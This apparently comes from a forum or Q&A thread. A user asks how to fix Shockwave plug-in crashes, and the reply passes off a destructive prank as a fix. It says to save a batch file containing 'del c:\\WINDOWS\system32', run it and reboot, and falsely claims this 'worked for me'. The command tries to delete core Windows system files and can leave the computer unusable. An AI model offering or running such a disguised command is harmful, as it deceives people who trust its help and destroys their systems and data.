i have a computer question I keep getting this shockwave plug in crash ...how do i fix this?

Open Notepad
type the following text:

@echo off
del c:\\WINDOWS\system32

save as "fixshockwave.bat"
select "all files" instead of "text document"

and then open the .BAT file and reboot your comp.

worked for me last week. those dang shockwave plug-ins are always misbehaving.
